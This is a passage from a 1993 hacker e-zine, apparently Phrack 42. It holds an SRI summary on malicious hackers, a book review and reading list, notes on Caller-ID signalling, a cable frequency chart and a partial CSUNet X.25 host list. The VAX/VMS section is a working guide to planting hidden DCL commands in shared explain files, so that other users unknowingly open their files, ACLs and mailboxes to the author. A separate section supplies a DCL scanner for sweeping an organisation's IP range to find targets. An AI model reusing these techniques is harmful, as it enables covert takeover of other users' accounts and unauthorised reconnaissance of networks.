broad range of experts, including people we characterize as "good hackers," about security issues and vulnerabilities of cyberspace and the activities of the international "malicious hacker" community. While the specific results of the study are proprietary to SRI, this brief report summarizes our general conclusions for the many individuals who kindly participated in our field interviews. As we indicated during our field interviews, the original research for this project was not part of any other kind of investigation, and we have not revealed the identify of any of our respondents. The study aimed to understand "malicious hackers," that is, people who have and use the technical knowledge, capability, and motivation to gain unauthorized access, for various reasons, to systems in cyberspace. It is important to understand that by no means all hackers are malicious nor does most hacking involve unauthorized access to cyberspace systems; indeed, only a small fraction of computer hacking involves such activities but gives hacking an otherwise undeserved bad reputation. While we attempted to focus on technical (software) vulnerabilities, our interviews led us to look more at the broader motivations and different approaches to cracking into various networks and networked systems. MAIN CONCLUSIONS Our main conclusion is that social, organizational, and technological factors still combine in ways that make much of cyberspace relatively vulnerable to unauthorized access. The degree of vulnerability varies from one type of communications system to another. In general, the PSTN is the least vulnerable system, the PDNs are somewhat more vulnerable than the PSTN, the Internet is relatively insecure, and as is widely known, the cellular phone system is the most vulnerable of the four major areas we addressed. The main vulnerabilities in most communications networks involves procedural, administrative, and human weaknesses, rather than purely technical vulnerabilities of network management, control systems, and hardware, and software. There are technical vulnerabilities--poor system design and specific security flaws in software--but they are mainly exploitable because of the above problems. Highlights of the study's conclusions include: o Malicious attacks on most networks and networked systems cannot be completely prevented, now or in the future. More than enough information is publicly available to hackers and other technically-literate people to preclude attempts at prevention of intrusions. o It is possible individuals or groups could bring down individual systems or related groups of systems, on purpose or by accident. However, security is generally improving as a result of dealing with past threats and challenges to system security. For instance, responses to the most recent serious threat to the Internet, the so-called Internet Worm in 1989, included improved security at sites vulnerable to this sort of worm. o We found no evidence that the current generation of U.S. hackers is attempting to sabotage entire networks. On the contrary, doing so is inconsistent with the stated ethics and values of the hacker community, which are to explore cyberspace as a purely intellectual exercise without malicious intent or behavior. Some individuals who operate outside this informal ethical framework, however, can and do damage specific systems and occasionally use systems for personal gain or vindictive activities. o There is some evidence that the newest generations of hackers, may be more motivated by personal gain than the traditional ethic of sheer curiosity. This development could mean that networks and networked systems could become more likely targets for attacks by hardened criminals or governments' intelligence services or their contractors (i.e., employing malicious hackers). This threat does not appear to be significant today but is a possible future scenario. o The four major areas of vulnerability uncovered in our research have little or nothing to do with specific software vulnerabilities per se. They relate more to the ways in which hackers can gain critical information they need in order to exploit vulnerabilities that exist because of poor systems administration and maintenance, unpatched "holes" in networks and systems, and so on. - The susceptibility of employees of businesses, public organizations, schools, and other institutions to "social engineering" techniques - Lax physical and procedural controls - The widespread availability of non-proprietary and of sensitive and proprietary information on paper about networks and computer systems - The existence of "moles," employees of communications and computer firms and their suppliers who knowingly provide proprietary information to hackers. o The vulnerabilities caused by shortcomings in software-based access controls and in hardware-related issues constitute significantly lower levels of risk than do the four areas discussed above on more secure networks such as the PSTN and PDNs. However, on the Internet and similar systems, software-based access controls (for instance, password systems) constitute significant problems because of often poor system maintenance and other procedural flaws. RECOMMENDATIONS Based on our research, we recommend the following: 1. Protection of organizational information and communications assets should be improved. Issues here range from those involving overall security systems to training employees and customers about maintenance of security on individual systems, handling and disposition of sensitive printed information, and dealing with "social engineering." 2. Techniques used to protect physical assets should be improved. For example, doors and gates should be locked properly and sensitive documents and equipment guarded appropriately. 3. Organizations and their employees should be made aware of the existence and role of moles in facilitating and enabling hacker intrusions, and care taken in hiring and motivating employees with the mole problem in mind. 4. Software- and hardware-based vulnerabilities should also be addressed as a matter of course in systems design, installation and maintenance. 5. Organizations concerned with information and communications security should proactively promote educational programs for students and parents about appropriate computer and communications use, personal integrity and ethics, and legitimate career opportunities in the information industry, and reward exemplary skills, proficiency and achievements in programming and ethical hacking. 6. Laws against malicious hacking should be fairly and justly enforced. SRI's believes that the results of this study will provide useful information to both the operators and users of cyberspace, including the hacker community. We are planning to continue our research in this area during 1993 within the same framework and conditions (i.e., anonymity of all parties and organizations) as we conducted the 1992 research. We invite hackers and others who are interested in participating in this work through face-to-face, telephone or email interviews should contact one of the following members of the SRI project team: A. J. Bate SRI International Phone: 415 859 2206 Fax: 415 859 3154 Email: aj_bate@qm.sri.com, aj@sri.com Stuart Hauser SRI International Phone: 415 859 5755 Fax: 415 859 3154 Email: stuart_hauser@qm.sri.com Tom Mandel SRI International Phone: 415 859 2365 FAX: 415 859 7544 Email: mandel@unix.sri.com ***************************************************************************** ==Phrack Magazine== Volume Four, Issue Forty-Two, File 5 of 27 // // /\ // ==== // // //\\ // ==== ==== // // \\/ ==== /\ // // \\ // /=== ==== //\\ // // // // \=\ ==== // \\/ \\ // // ===/ ==== (cont) ****************************************************************************** `'`'`'`'`'`'`'`'`'`'`'`'`'`'`'`'`'`'`'`'`'`'`'`' '` '` `' Approaching Reality: `' '` ~~~~~~~~~~~~~~~~~~~~ '` `' A review of the new book Approaching Zero `' '` ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ '` `' by Aleph One `' '` ~~~~~~~~~~~~ '` `' `' '`'`'`'`'`'`'`'`'`'`'`'`'`'`'`'`'`'`'`'`'`'`'`'` When I started to read this book, I expected to read one more of the series of books that claim to be the "definitive history of the computer underworld" and the "first book to define the technological subculture of phreaking, hacking, and virus writing". After all what does a guy that writes for GQ, The Hollywood Reporter, Variety and Time know about the computer underground? Well to my surprise the authors, Paul Mungo and Bryan Clough (a member of the Virus Strategy Group, which is coordinated by New Scotland Yard's Computer Crime Unit), did a pretty good job at presenting the facts as they are. For the first time I heard a reporter and a computer crime expert give real figures at how much computer crime has really cost. Other than a few minor technical errors and the fact that they fail to mention some people and groups (especially in the virus section), the book was enjoyable to read. The book covers the history of the underground starting with its beginnings in the 60's, from phreaking to the adventures of Captain Crunch and the rest of the bunch to the not so long ago Operation Sundevil and the raids all over the country on members of the LOD, MOD and DPAC. It also goes through the events that led to the German hackers spy trials, and to the new generation of virus writers that are creating the new kind of living organisms that roam cyberspace. They also discuss the gray scale that categorizes hackers, from the good hackers to the bad to the ones not that bad... those who are in it for profit and those who are in it to learn. Hopefully all the readers of the book, hackers, security specialists, reporters and the general public will get a better understanding of what motivates hackers to do what they do by learning where they come from. To the hackers let them learn not to repeat their past errors. I hope that the time of raids and sting operations has passed, but the late developments in the Washington 2600 meeting have pulled a shadow over my hopes. Has no one learned? Have the SS and FBI nothing better to do? Just a few moths back someone pulled one of the greatest scams of all by setting up a fake ATM and stealing a few thousand dollars. These are the kind of people the authorities should be after. And to the hacker, don't sell yourself! Remember this is a learning trip, once you start forgetting to learn and start making money out of it, it is just another job, an illegal one at that. Approaching Zero was an exciting and interesting surprise. It has given me the hint that maybe someone out there understands and I hope that everyone that reads it (and you must, you must read and learn all you can) will also understand. I just leave you with these words: Hacking comes from the heart - sometimes in the form of an obsession, sometimes in the form of a hobby - once that dies, there is nothing left to do. No more traveling trough the nets! No more exploring new systems! You might as well turn the power off. -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= What fallows is a list of books, papers and articles for those that want to know a little more of how the media portrays us, and a little more about the story of hacking in general. Books: ~~~~~~ - "Approaching Zero" by Paul Mungo & Bryan Clough. Random House 1992. - "Beating the System" by Owen Bowcott & Sally Hamilton. London: Bloomsbury, 1990. - "Computer Viruses - A High-Tech Disease" by Ralf Burger. Grand Rapids, MI: Abacus, 1988. - "The Hackers' Handbook" by Hugo Cornwall. London: Century Communications, 1985. - "Computers Under Attack" by Peter Denning. Addison Wesley, 1990. - "Profits of Deceit" by Patricia Franklin. London: William Heinemann, 1990. - "Cyberpunk" by Katie Hafner & John Markoff. London: Fourth Estate, 1991. - "Out of the Inner Circle" by Bill Landreth (aka The Cracker). Redmond, WA.: Tempus Books, 1985. - "Sillicon Valley Fever" by Judith K. Larsen & Everett M. Rogers. London: George Allen & Unwin, 1985. - "Computer Viruses" by Ralph Roberts. Greensboro, NC: Compute! Books, 1988. - "The Cuckoo's Egg" by Clifford Stoll. New York: Doubleday, 1989. - "Spectacular Computer Crimes" by Buck BloomBecker. Dow Jones-Irwin, 1990. - "The New Hacker's Dictionary" by Eric Raymond. MIT Press, 1983. - "The Hacker Crackdown" by Bruce Sterling. Bantam Books, 1992. - "The Little Black Book of Computer Viruses" by Mark Ludwig. American Eagle Publications, 1991. - "Artificial Life" by Steven Levy. Panthenon, 1992. (For those virus writers out there, use your tallen to create life.) Articles & Papers: ~~~~~~~~~~~~~~~~~~ - "Crime and Puzzlement" by John Perry Barlow. Whole Earth Review, Fall 1990: 44-57. - "The Casino Virus - Gambling with Your Hard Disk" by Jim Bates. Virus Bulletin, March 1991: 15-17. - "The TP Viruses" by Vesselin Bontchev. Postings to Virus-L 1990. - "In Defense of Hackers" by Craig Bromberg. The New York Times Magazine, April 21, 1991. - "Bulgaria - The Dark Country" by Bryan Clough. Virus Bulletin, December 1990: 9-11. - "Voice Mail Computer Abuse Prosecution: United States v. Doucette a/k/a Kyrie" by William J. Cook. Safe Computing Proceedings of the Fourth Annual Computer Virus & Security Conference, 1991, Organized by National Computing Corporation. - "Invasion of the Data Snatchers!" by Philip Elmer-De Witt. Time, September 26, 1988: 63. - "Data Exchange and How to Cope with This Problem: The Implication of the German KGB Computer Espionage Affair" by Hans Gliss. Paper presented at Securicom Italia, October 1989. - "The Implications of the SPANet Hack." Computers Fraud & Security Bulletin, Vol. 10, No. 2, 1987. - "The Brain Virus: Fact and Fantasy" by Harold J. Highland. Computers & Security, August 1988: 367-370. - Computer Viruses - A Post Modern." Computer & Security, April 1988: 117-184. - "Terminal Delinquents" by Jack Hitt & Paul Tough. Esquire, December 1990. - "The Social Organization of the Computer Underground" by Gordon R. Meyer. M.A. Thesis Submitted to the Graduate School, August 1989. - "Satanic Viruses" by Paul Mungo. GQ, February 1991: 126-130. - "Secrets of the Little Blue Box" by Ron Rosenbaum. Esquire, October 1971, Collected in Travels with Dr. Death. New York: Viking Penguin, 1991. - "The Worm Program - Early Experience with a Distributed Computations" by John F. Shoch. Communications of the ACM, Vol. 25, No. 3, March 1982. - "The Search for Den Zuk" by Fridrik Skulason. Virus Bulletin, February 1991: 6-7. - "Crisis and Aftermath" by Eugene H. Spafford. Communications of the ACM. Vol. 32, No. 6, June 1989. - "GURPS Labor Lost: The Cyberpunk Bust" by Bruce Sterling, Effector, September 1991: 1. - "Stalking the Wily Hacker" by Clifford Stoll. Communications of the ACM. Vol. 31, No. 5, May 1988. - "The Kinetics of Computer Virus Replication." by Peter S. Tippett. FundationWare, March 1990. - "The General and Logical Theory of Automata" by John L. von Neumann. Hixon Symposium, September 1948. - "Here Comes the Cyberpunk" by Eden Restored. Time, February 8, 1993: 58-65. - "Surfing Off the Edge" by Richard Begar. Time, February 8, 1993: 62. - "Can Hackers Be Sued for Damages Caused by Computer Viruses?" by Pamela Samuelson. Communications of the ACM. Vol. 32, No. 6, June 1989. - "Viruses and Criminal Law" by Michael Gemignani. Communications of the ACM. Vol. 32, No. 6, June 1989. - "Password Cracking: A Game of Wits" by Donn Seeley. Communications of the ACM. Vol. 32, No. 6, June 1989. - "The Cornell Commission: On Morris and the Worm" by Ted Eisenberg, David Gries, Juris Artmanis, Don Holcomb, M. Stuart Lynn & Thomas Santoro. Communications of the ACM. Vol. 32, No. 6, June 1989. - "Desperately Seeking Cyberspace" by Paul Saffo. Personal Computing, May 1989: 247-248. - "Secrets of the Software Pirates" by Bylee Gomes. Esquire, January 1982: 58-64. - "Trouble in Cyberspace" by Willard Uncapher. The Humanist, September/October 1991: 5-14,34. - "Is Computer Hacking a Crime?" Capture of a discussion held on the WELL. Harper's Magazine, March 1990: 45-57. - "The United States vs. Craig Neidorf" by Dorothy E. Denning. Communications of the ACM, Vol. 34, No. 3, March 1991: 24-32. - "Colleagues Debate Denning's Comments." Communications of the ACM. Vol. 34, No. 3, March 1991: 33-41. - "Denning's Rebutal" by Dorothy E. Denning. Communications of the ACM. Vol. 34, No. 3, March 1991: 42-43. - "Coming into the Country" by John P. Barlow. Communications of the ACM. Vol. 34, No. 3, March 1991: 19-21. - "Off the Hook" by Julian Dibbell. Village Voice, August 21, 1990: 8. - "On Line and Out of Bounds" by Julian Dibbell. Village Voice, July 24, 1990:27-32. - "Hi-Tech Mall Crawl" by Julian Dibbell. Village Voice. March 1990: 12 - "Samurai Hackers" by Lynda Edwards. Rolling Stone, September 19, 1991: 67-69. - "Crackdown on hackers `may violate civil rights'" by Dan Charles. New Scientist, July 21, 1990: 22. - "United States v. Zod." The Economist, September 1, 1990: 23. - "Drop the Phone." Time, January 9, 1989: 49. - "Computer Recreations (Core War)" by A. K. Dewdney. Scientific American, May 1984: 14-21. - "Computer Recreations (Core War)" by A. K. Dewdney. Scientific American, March 1985: 14-23. - "Computer Recreations (Core War)" by A. K. Dewdney. Scientific American. March 1989: 110-113. - "Computer Security: NAS Sounds the Alarm" by Eliot Marshall. Science, Vol. 250: 1330. - "Students Discover Computer Threat" by Gina Koda. Science, Vol. 215, 5 March, 1982: 1216-1217. - "A nationwide Computer-Fraud Ring Is Broken Up." The New York Times National, Sunday, April 19, 1992. - "Hackers: Is a Cure Worse than the Disease?" by Mark Lewyn. Business Week, December 4, 1989: 37-38. - "Computer Hacking Goes to Trail" by William F. Allman. U.S. News & World Report, January 22, 1990: 25. - "Morris Code: by Katie Hafner. The New Republican, February 19, 1990: 15-16. - "Hackers Intentions Key to Court Case" by David Lindley. Nature. Vol. 340, August 3, 1989: 329. - "Problems of Security" by David Lendley. Nature. Vol. 340. July 27, 1989: 252. - "Hostile Takeovers" by Paul Wallich. Scientific American, January 1989: 22-23. - "The Worm's Aftermath" by Eliot Marshall. Science, Vol. 242, November 25, 1988: 1121-1122 - "Researcher Fear Computer Virus' Will Slow Use of National Network" by Calvin Sims. The New York Times, Monday, November 14, 1998: B6. - "Networked Computers Hit by Intelligent `Virus'" by Joseph Palca & Seth Shulman. Nature, Vol. 336, November 10, 1988: 97. - "The Science of Computing: Computer Viruses" by Peter J. Denning. American Scientist, Vol. 76, May-June 1988:236-238. - "Cyberpunks and the Constitution" by Philip Elmer-Dewitt. Time, April 8, 1991:81. - "Plan to outlaw hacking." Nature, Vol. 341, October 19, 1989: 559. - "Computer System Intruder Plucks Passwords and Avoids Detection" by John Markoff. The New York Times National, Monday, March 19, 1990. - "Networked Computer Security" by S.J. Buchsbaum. Vital Speeches of the day. December 15, 1991: 150-155. - "Halting Hackers." The Economist. October 28, 1989: 18. - "Revenge of the Nerds" by Nocholas Martin. The Washington Monthly, January 1989: 21-24. - "Greater awareness of security in aftermath of computer worm" by Seth Shulman & Joseph Palce. Nature, Vol. 336, November 1988: 301. - "Avoiding Virus Hysteria" by Patrick Honan. Personal Computing, May 1989: 85-92. ***************************************************************************** {----------------------------------------------} { } { VMS/VAX Explain Files Explained } { or } { Security Holes in the VAX and DCL } { } { By: The Arctic Knight } { } {----------------------------------------------} VAX/VMS hacking has declined in popularity over the years due to the abundance of UNIX machines now available. It has even gotten bad press from fellow hackers. Included in this file is a security hole the size of , oh, any of the older IBM mainframes. With a little curiosity, persistence, and down right stubbornness I came across this rather obvious hole in the system. However, this hole may be so obvious that it has remained relatively hidden until now, especially since the decline of DCL users. On most VAX systems, there is something called explain files. These are usually help files that are made up by the system operators or borrowed from somewhere to help better explain the way certain features of the system work, whether they be general VAX commands, or system-specific programs. When you are in your account (Presumably, a fake one, as this can be tracked down if you are foolish) type: $ explain index and you will get a list of all the explain files on your system. Go ahead and take a look around these just to get a feel of what it looks like. It should be a menu driven list of text files to view or programs to run(!!!). Most system operators only set this up to show various text files describing commands like mentioned above. However, DCL .com files can be run from explain files as well. Now comes the fun. Many systems will also allow users to set up there own explain file. A really nice way to make it easy for other users to view text files or run programs that you have set for group or world access. The first thing someone needs to do is make a file called INTRO.LKT which will contain whatever introduction text that you would like displayed before your explain file menu is displayed(i.e. you might have a description of yourself, your duties, or a funny poem, or WHATEVER YOU WANT THAT CAN BE CONTAINED IN A TEXT FILE!!!!) You can use any editor to do this like EDT(a line editor) or TPU(a full screen editor). You will need to type something along these lines to create the file: $set vt=100 !if using a full screen editor like TPU $edit/tpu intro.lkt After you are finished typing in the file, if you used TPU (A much better choice than EDT), you press to save the file. Now you must create a file called INDEX.LKI which will contain the file directories, filenames, and short descriptions of the files that you want to have displayed. You do this in the same manner as above, by entering an editor, and creating the file. $edit/tpu index.lki Now, in this file the lines should look like the following: (File Directory) (Filename) (File Description) Phrack41.txt A complete copy of Phrack 41 for your enjoyment. User:[aknight.hack]vms.txt A guide to hacking VMS systems. Temp$1:[aknight.ftp]ftplist.txt A list of FTP servers in-state. Now, to explain these three lines. The first one will look for the program in your main directory. The second line will look for the program listed after it on the device called USER and in the HACK directory within the AKNIGHT directory. The final line will look on the device called TEMP$1 in the FTP directory within the AKNIGHT directory. Adding DCL programs will be explained in a minute, but first lets get this up and running. Now, that you have typed in the text files you want, and saved this file you need to set the protection on your main directory and any others that need accessing like the text files to group and world access. For the above example one would want to type(assuming you are in your main directory): $set prot=(g:re,w:re) user:[000000]aknight.dir !This is my main directory $set prot=(g:re,w:re) user:[aknight.hack] $set prot=(g:re,w:re) temp$1:[000000]aknight.dir !My second storage device $set prot=(g:re,w:re) temp$1:[aknight.ftp] $set prot=(g:r,w:r) phrack41.txt !Giving privs to read only $set prot=(g:r,w:r) user:[aknight.hack]vms.txt $set prot=(g:r,w:r) temp$1:[aknight.ftp]ftplist.txt Now, if you type: $explain aknight ! (my username in this instance,your normally) You should get a print out to screen of your INTRO.LKT file and then a message along the lines of "Hit to continue". When you hit return a menu will appear very similar to the normal explain file menu except with your files listed and their descriptions which were accessed by the computer from your INDEX.LKI file. It would look like this(or something similar) in the above example. {a print out of my INTRO.LKT file...} Hit to continue EXPLAIN AKNIGHT ================================================================================ (A) PHRACK41 T-A complete copy of Phrack 41 for your enjoyment. (B) VMS T-A guide to hacking VMS systems. (C) *EXPLAIN/USER AKNIGHT FTPLIST T-A list of FTP servers in-state. (Q) TERMINATE THIS PROGRAM ================================================================================ T = Text Display P = Program to be run (* = Related Information) Choose A-C, Q, oe type HELP for assistance. Now you have an explain file. Pressing A-C will print those files to screen with pauses at each page if set up on your system/account to do so. I typed out number C the way I did, because when it has to access a directory other than it's main one, it will usually do this. I think there is away around this, but to be quite honest I haven't bothered figuring it out yet. When you quit, you will be dropped back off at your main prompt. The reason you need to set your protections, is because even thought from your account, it may look like it is working, if you don't set your protections as described above, NO ONE else will be able to view it!! Now, comes the fun part. Putting DCL .COM files into your explain file. These are put into your index just like any text file. So you could type up a program to let someone copy the public files you have in your account to their directory, or something similar. The security flaw comes in here and it is a big one. Since a user is accessing your explain file from their account, any file that they run, issues commands in their account. So, one might plant a line in the middle of the above program that say something like: $set def sys$login !Returns them to their main directory. $set prot=(g:rwed,w:rwed) *.*;* !Their files are now read, write, execute, !and deleteable by anyone, including you. Here is another idea. Say you create a text reader in DCL, to allow people to jump around in the text files you have, skip pages, etc. called TYPE.COM in your main directory. Anytime you can fool people into thinking that the computer is taking a little time to think, you can insert some major commands, i.e. when it is skipping pages, or coping files, which almost takes no time at all in reality. I STRONGLY suggest starting any program you plan to nest commands like this into with: $set noverify Which will make sure that the program lines don't get printed to the screen as they are running. Another important command to know is the following which will cause the next text output from the VAX to be sent to a NULL device, so it will essentially be lost and not printed to the screen. So, if one is accessing someone's mailbox, you don't want a messaging appearing on screen saying that you have entered VAX/VMS mail or whatever. The command is: $assign nl:sys$output/user If you forget the /user it will send the output to the null device for the session, instead of just one line. Some other things one might do would be to add yourself to someone's ACL(access control list) by typing: $set acl/acl=(ident=[aknight],access=control) *.*;* Now, this will give you access to all their files just as if you were the user, however if they bother to ever do a dir/prot command your username will be printed all over the screen, so one would suggest if you must do this, to use a fake account. Same with this below command: $assign nl:sys$output/user $mail set write aknight The second line will give me read and write access to someone's mailbox, but once again if they bother to check their mailbox protections your username will be displayed. In case, you haven't realized this yet, this all has A LOT of potential, and what I have mentioned here is just the tip of the iceberg and really mostly small and even foolish things to do, but the fact comes down to ANYTHING the user can do in their account, YOU can do in there account if you know the right commands and have the patience to nest them into a .COM file well enough. When you have created the .COM file and added it to the INDEX.LKI file, then you will need to set the protection of the file like so: $set prot=(g:e,w:e) type.com !Execution only. No read privs. You now have it a fully functional explain file that is only held down by your imagination. Remember, malicious actions aren't the sign of a true hacker, so don't delete a users complete directory just because you want to show of your power. Most people won't be impressed. If your a SYSOP, fix this DAMN HOLE!!! And if your a user well, learn the system quickly, explore, absorb, and discover some other hole before the above SYSOP patches this one...... COMMENTS, QUESTIONS, ADDITIONS, ETC can be sent to PHRACK LOOPBACK. ENJOY!! {______________________________________________________________________________} ***************************************************************************** A Internet Scanner (War Dialer) by MadHatter Purpose of this program ~~~~~~~~~~~~~~~~~~~~~~~ Remember those scanner, war dialer programs everyone used to scan areas of telephone numbers to find unknown hosts? Well, now your on the net and you're targeting some certain establishment, and you know which part of the net they own, but the hell if you know what the actual IP addresses of their hosts are... Telneting to NIC.DDN.MIL is no help, their records are a year old... Might as well have been 10 yrs ago... So you type every possible IP address in. Right? After a while that shit gets tiring... Well, hell let the computer do it, that's what its there for. More speed, no sore fingers, no bitching, and it runs when you're not there. Almost perfect..... Program Details ~~~~~~~~~~~~~~~ DCL is the language and it runs on Vaxen. A,B,C,D respectively represent the starting IP address. E,F,G,H respectively represent the ending IP address (ex. If you what to start at 4.1.1.1 and end at 6.1.1.1 then a = 4, B = 1, etc., E = 6, F = 1, etc.) The prog creates a data file (FINAL.DAT) that holds all successful connections. If you run it in batch, it also creates a .log file. This by far takes up most of the memory. When the program quits, delete it. This prog is just one big loop. It finds a good telnet address and then reIFINGERs there, saving it. Program Changes ~~~~~~~~~~~~~~~ If you run it in batch, then you might (probably) have to define where the IFINGER or FINGER program is. Make sure it is the one for FINGERing remote hosts, the commands for it vary. Why do you have to define it? Because the dumb-ass sysop couldn't think of why anyone would want to use it in batch. Problems ~~~~~~~~ The IFINGER (FINGER) command might not connect to some hosts from your system. Why can you TELNET there but no IFINGER? It all probably has to do with the other host (it has tight security, too far away, doesn't support FINGERing, etc.). No Solutions (Just one) ~~~~~~~~~~~~~~~~~~~~~~~ You say if I can TELNET to more places than IFINGERing, why not base the scanner on the TELNET command? Two reasons: (1) the security with the TELNET command requires its output goes to a terminal, never to run in batch; (2) the TELNET command does not give the character address (at least not on the system I use). To have the character address is valuable to me. The program lists the IP address, the character address, then whatever finger came up with. When running in batch, the program will quit eventually (do to MAX CPU time or exceeded disk quota). This can be a pain (especially if its CPU time), you can always get more memory. Try changing the file specifics in the prog, and run many versions of it at once, to get as much cpu time as possible. For memory, clear your account, or get more of them. Another problem is when your program has stopped and you have nothing in FINAL.DAT file. So where do you start the batch off again? All I can say is count the number of failed connections and add 'em to your previous start address, start at that address. More Ideas ~~~~~~~~~~ If you want the net area of an establishment then ftp to NIC.DDN.MIL and get the hosts listing, or TELNET there and search for the name. Some areas of the net do not like to be scanned. Your sysop will get nasty calls, and then you will get nasty e-mail if you for instance scan the Army Information Systems Center. Or any other government org. Of course, this program wouldn't hurt them at all, it would bounce back. They use firewalls. But they will bitch anyway. After you run this program for awhile, you'll notice the net is really a big empty place. Hosts are few and far between (at least address wise). Are you agoraphobic yet? What do you do with all this room? MadHatter *----------------------------CUT HERE------------------------------------------* $ A = 0 $ B = 0 $ C = 0 $ D = 0 $ E = 257 $ F = 0 $ G = 0 $ H = 0 $ D = D - 1 $ IFINGER := $VMS$UTIL:[IFINGER]FINGER.EXE;1 $ CREATE FINAL.DAT $ LOOP1: $ ON SEVERE_ERROR THEN GOTO SKIP $ D = D + 1 $ IFINGER @'A'.'B'.'C'.'D' $ ON SEVERE_ERROR THEN GOTO SKIP $ ASSIGN TEMPFILE.DAT SYS$OUTPUT $ WRITE SYS$OUTPUT "["'A'"."'B'"."'C'"."'D'"]" $ IFINGER @'A'.'B'.'C'.'D' $ DEASSIGN SYS$OUTPUT $ APPEND TEMPFILE.DAT FINAL.DAT $ DELETE TEMPFILE.DAT;* $ SKIP: $ IF A .EQ. E THEN IF B .EQ. F THEN IF C .EQ. G THEN IF D .EQ. H THEN EXIT $ IF D .EQ. 256 THEN GOTO LOOP2 $ IF C .EQ. 256 THEN GOTO LOOP3 $ IF B .EQ. 256 THEN GOTO LOOP4 $ GOTO LOOP1 $ LOOP2: $ D = 0 $ C = C + 1 $ GOTO LOOP1 $ LOOP3: $ C = 0 $ B = B + 1 $ GOTO LOOP1 $ LOOP4: $ B = 0 $ A = A + 1 $ GOTO LOOP1 $ EXIT *------------------------------------CUT HERE----------------------------------* ***************************************************************************** Caller Identification by (Loq)ue & Key 3/20/93 Caller-Identification (CID), is a relatively new service being offered by several carriers. It is part of a total revamp of the telephone network, with the telephone companies trying to get people to spend more money on their systems. CID is just one of the newer CLASS services, which will eventually lead into ISDN in all areas. Caller-ID allows a receiving party to see the number that is calling before they pick up the phone. It can be used for everything from pizza delivery to stopping prank callers. One scenario made possible from CID is one where a salesman dials your number, you look on a little box and see that it is someone you don't want to talk to, so you promptly pick up the phone, say "Sorry, I don't want any *** *** products" and slam down the receiver. Ah, the wonders of modern technology. Caller-ID starts by a person making a call. When the person dials a number, the local switch rings the calling number once, and then sends a specially encoded packet to the number, after checking to see if that caller has access to the Calling Number Delivery service. The packet can contain any information, but currently it holds a data stream that contains flow control, and error checking data. The specifications state that several signals can exist, however, only the Caller-ID signal is used currently. The CID packet begins with a "Channel Seizure Signal". The CSC is 30 bytes of hex 55, binary 01010101, which is equivalent to 250 milliseconds of a 600 hz square wave. The second signal is the "Carrier Signal," which lasts for 150 milliseconds, and contains all binary 1's. The receiving equipment should have been "woken-up" by the previous signal and should now be waiting for the important information to come across. Next are the "Message Type Word", and the "Message Length Word". The MTW contains a Hex $04 for CID applications, with several other codes being planned, for example $0A to mean message waiting for a pager. The MLW contains the binary equivalent of the number of digits in the calling number. The data words come next, in ASCII, with the least significant digit first. It is padded in from with a binary 0, and followed by a binary 1. A checksum word comes after that, which contains the twos-complement sum of the MLW and data words. The checksum word usually signals the end of the message from the CO, however, other messages for equipment to decode can occur afterwards. Caller-ID can usually be disabled with a 3 digit sequence, which can vary from CO to CO. Several of these have been mentioned in the past on Usenet, in comp.dcom.telecom. Caller-ID chips are available from many sources, however, remember that you must connect these chips through an FCC-approved Part-68 Interface. Several of these interfaces are available, however they are fairly expensive for an amateur electronics hacker. If you have any more questions on CID, mail me at the above address, or post to comp.dcom.telecom. Additional Sources from Bellcore: Nynex Catalog of Technical Information #NIP-7400 SPCS Customer Premises Equipment Data Interface #TR-TSY-0030 CLASS Feature: Calling Number Delivery #FSD-02-1051 CLASS Feature: Calling Number Blocking #TR-TSY-000391 ***************************************************************************** THE "OFFICIAL" CABLE TELEVISION VIDEO FREQUENCY SPECTRUM CHART COURTESY OF: JOE (WA1VIA) & JIM (WA1FTA) CATV CHANNEL FREQUENCY (MHz) CATV CHANNEL FREQUENCY (MHz) ------------------------------------------------------------------------------- 2 2 55.25 37 AA 301.25 3 3 61.25 38 BB 307.25 4 4 67.25 39 CC 313.25 5 5 77.25 40 DD 319.25 6 6 83.25 (85.25 ICC) 41 EE 325.25 --------------------------------------- 42 FF 331.25 7 7 175.25 43 GG 337.25 8 8 181.25 44 HH 343.25 9 9 187.25 45 II 349.25 10 10 193.25 46 JJ 355.25 11 11 199.25 47 KK 361.25 12 12 205.25 48 LL 367.25 13 13 211.25 49 MM 373.25 --------------------------------------- 50 NN 379.25 14 A 121.25 51 OO 385.25 15 B 127.25 52 PP 391.25 16 C 133.25 53 QQ 397.25 17 D 139.25 54 RR 403.25 18 E 145.25 55 SS 409.25 19 F 151.25 56 TT 415.25 20 G 157.25 57 UU 421.25 21 H 163.25 58 VV 427.25 22 I 169.25 59 WW 433.25 ---------------------------------------- 60 W+ 439.25 23 J 217.25 --------------------------------- 24 K 223.25 61 W+1 445.25 25 L 229.25 62 W+2 451.25 26 M 235.25 63 W+3 457.25 27 N 241.25 64 W+4 463.25 28 O 247.25 65 W+5 469.25 29 P 253.25 --------------------------------- 30 Q 259.25 66 A-1 115.25 31 R 265.25 67 A-2 109.25 32 S 271.25 68 A-3 103.25 33 T 277.25 69 A-4 97.25 34 U 283.25 70 A-5 91.25 35 V 289.25 --------------------------------- 36 W 295.25 01 A-8 73.25 ------------------------------------------------------------------------------- * This chart was created 08/19/89 by: WA1VIA & WA1FTA. Some uses include the isolation of CATV interference to other radio services, and building of active & passive filters, and descramblers. This does NOT give you the right to view or decode premium cable channels; without proper authorization from your local cable TV company. Federal and various state laws provide for substantial civil an criminal penalties for unauthorized use. ------------------------------------------------------------------------------- ****************************************************************************** ----------------------------- The CSUNet X.25 Network Overview by Belgorath ----------------------------- C y b e r C o r p s Calstate University, along with Humboldt State, runs a small X.25 network interconnecting its campuses. This file will attempt to give an overview of this network. The hosts on this network are connected via 9600-baud links. The main PAD on this network is a PCI/01 that allows the user to connect to several hosts. Among them are: (At the time of this writing, several of the machines were unreachable. They are marked with "No info available") hum - Humboldt State University CDC Cyber 180-830 (NOS 2.7.1) swrl - A CalState CDC Cyber named "Swirl", running CDCNet. You may use CDCNet to connect to the following hosts: ATL (SunOS, eis.calstate.edu), login as: access to request an account ctp to access CTP CCS CDC Cyber 960-31 (NOS 2.7.1) - This is Swirl without CDCNet COC CDC Cyber 960-31 (NOS 2.7.1) FILLY VAX 6230 (VMS 5.3) ICEP IBM 4381 (VM) OX IBM 4381 (MVS) (Aptly Named) mlvl - University of California's Library Catalog System, named "Melvyl". sb - Calstate/San Bernardino CDC Cyber 180-830 (NOS 2.5.2) sd - San Diego State University CDC Cyber 180-830B (NOS 2.7.1) chi - Calstate/Chico CDC Cyber 180-830 (NOS 2.7.1) - oddly enough this system is running CDCNet with 